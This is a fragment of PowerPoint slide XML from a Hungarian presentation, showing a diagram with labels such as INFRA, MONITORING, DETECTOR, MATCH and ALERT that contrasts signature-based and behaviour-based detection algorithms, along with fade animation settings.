                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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1" name="Egyenes összekötő nyíllal 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A3311B-0844-4DC2-9FA2-9BC2FAFCFC50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="18" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1588767" y="3041397"/>
            <a:ext cx="0" cy="445770"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Arc 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C924C2-372B-E5F2-C175-B794B64B4ADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5342359" y="2282593"/>
            <a:ext cx="6217919" cy="3970231"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13865710"/>
              <a:gd name="adj2" fmla="val 12683146"/>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hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Összekötő: görbe 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16CA2C90-E6C2-461F-BDAE-ED2A8444B6ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7921745" y="3526936"/>
            <a:ext cx="967281" cy="91866"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41575"/>
              <a:gd name="adj2" fmla="val 749978"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>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37" name="Összekötő: görbe 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B55D757-04CF-46D8-9B50-431886006587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="1"/>
            <a:endCxn id="30" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8819828" y="2828037"/>
            <a:ext cx="967993" cy="618430"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>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39" name="Összekötő: görbe 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB2BA66-679A-420F-A889-50480567D79E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="38" idx="0"/>
            <a:endCxn id="3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1" flipV="1">
            <a:off x="8911087" y="4065794"/>
            <a:ext cx="110485" cy="1045316"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val -206906"/>
              <a:gd name="adj2" fmla="val 66280"/>
              <a:gd name="adj3" fmla="val 306906"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>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57" name="Összekötő: görbe 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAB9AD5C-E5B9-4A7E-97E0-AFFFC161C329}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="56" idx="2"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6462350" y="4757016"/>
            <a:ext cx="1186129" cy="510283"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>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24" name="Egyenes összekötő nyíllal 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E60D3DED-4CEA-4D2E-ABCB-77D16551E67C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="1"/>
            <a:endCxn id="25" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1588767" y="4294876"/>
            <a:ext cx="0" cy="41528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5" name="Egyenes összekötő nyíllal 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{393AE257-BA87-4757-98AE-34CE92A944AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2434587" y="2595627"/>
            <a:ext cx="426720"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3" name="Egyenes összekötő nyíllal 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C45422-2545-45E5-92AC-C87424BFA151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3661407" y="2896617"/>
            <a:ext cx="0" cy="464820"/>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23" name="Egyenes összekötő nyíllal 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88BA8311-A6D8-4446-8174-07FB66917BE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2434587" y="3879597"/>
            <a:ext cx="815340" cy="11425"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>detekciós algoritmusok</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016234A2-1CE9-4F1E-A03C-0D4E7BDC2B88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742947" y="1299801"/>
            <a:ext cx="3718560" cy="373371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">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hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SZIGNATÚRA ALAPÚ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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A65ABDBD-F02A-47FB-8CB6-2E1ABB483D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6105836" y="1298889"/>
            <a:ext cx="4507232" cy="373371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">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hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>VISELKEDÉS ALAPÚ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Téglalap: lekerekített 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F9DD96-4604-45C3-8C57-E5F702F57E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742947" y="2149857"/>
            <a:ext cx="1691640" cy="89154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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>INFRA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Téglalap: lekerekített 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44F38366-B4D1-478B-BB8D-E55EBD2109F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2861307" y="2294637"/>
            <a:ext cx="1600200" cy="60198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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MONITORING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Folyamatábra: Mágneslemez 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAFF31B9-BF8C-411B-9B55-194747B0F94E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3249927" y="3361437"/>
            <a:ext cx="822960" cy="1036320"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">
            <a:avLst/>
          </a:prstGeom>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Téglalap: felső két sarkán lekerekítve 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF8EDCBA-DDDE-454C-86CD-1D4BF6EDB911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742947" y="3487167"/>
            <a:ext cx="1691640" cy="807709"/>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DETECTOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Folyamatábra: Döntés 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C56E8B5C-08D7-4629-9BD8-A209631FDAA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742947" y="4710161"/>
            <a:ext cx="1691640" cy="1021024"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDecisi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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MATCH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Felirat: négyágú nyíllal 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089CE6D3-F136-4CB4-B93D-FBABFF36F147}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="7744107" y="3933317"/>
            <a:ext cx="819593" cy="841215"/>
          </a:xfrm>
          <a:prstGeom prst="quadArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30136"/>
              <a:gd name="adj2" fmla="val 34868"/>
              <a:gd name="adj3" fmla="val 10673"/>
              <a:gd name="adj4" fmla="val 6360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hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Folyamatábra: Dokumentum 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E71996-8D4E-469D-A00E-0BEC3D969D0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899077" y="2527047"/>
            <a:ext cx="920750" cy="601980"/>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FILE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Folyamatábra: Dokumentum 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213C93E6-0B2D-4659-9DEF-1372D5DAD20A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9787820" y="3145477"/>
            <a:ext cx="920750" cy="601980"/>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>REG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Folyamatábra: Dokumentum 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54CCAF63-5C97-4D4F-B167-99594BDE1189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028613" y="4533210"/>
            <a:ext cx="920750" cy="601980"/>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>USERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Folyamatábra: Dokumentum 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2481E8DC-96F9-4511-9FEB-B4D9563128B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7310556" y="5304233"/>
            <a:ext cx="920750" cy="601980"/>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Folyamatábra: Dokumentum 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E08F2D-4818-462A-AFBC-D409562986B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6339898" y="3856912"/>
            <a:ext cx="920750" cy="601980"/>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Folyamatábra: Döntés 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4BDA0B9-C1EE-4BB7-BD99-401B5AD64BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569008" y="2068204"/>
            <a:ext cx="1691640" cy="1021024"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDecisi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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MATCH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Felirat: négyágú nyíllal 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32208539-FB47-65A6-28A2-2BDC1E246A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2700000">
            <a:off x="7744106" y="3933317"/>
            <a:ext cx="819593" cy="841215"/>
          </a:xfrm>
          <a:prstGeom prst="quadArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30136"/>
              <a:gd name="adj2" fmla="val 34868"/>
              <a:gd name="adj3" fmla="val 10673"/>
              <a:gd name="adj4" fmla="val 6360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hu-HU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Összekötő: görbe 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{627960BD-454B-4395-8546-18F785BA11A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="40" idx="0"/>
            <a:endCxn id="3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7487262" y="4935008"/>
            <a:ext cx="652894" cy="85557"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 40566"/>
              <a:gd name="adj2" fmla="val -805282"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Téglalap: lekerekített 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4398FD68-C825-4C49-8C11-61A6B286A4F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3148895" y="4915917"/>
            <a:ext cx="1025024" cy="59126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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ALERT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Egyenes összekötő nyíllal 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5977D44-070A-497D-9BBD-25CEE3E022EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="3"/>
            <a:endCxn id="50" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2434587" y="5211548"/>
            <a:ext cx="714308" cy="912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9" name="Összekötő: szögletes 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2249F4D9-87AD-4B53-807F-05C2A37C5461}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="50" idx="3"/>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4173919" y="2595627"/>
            <a:ext cx="287588" cy="2615921"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 179489"/>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2274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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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fade">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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fade">
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>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
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="113" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
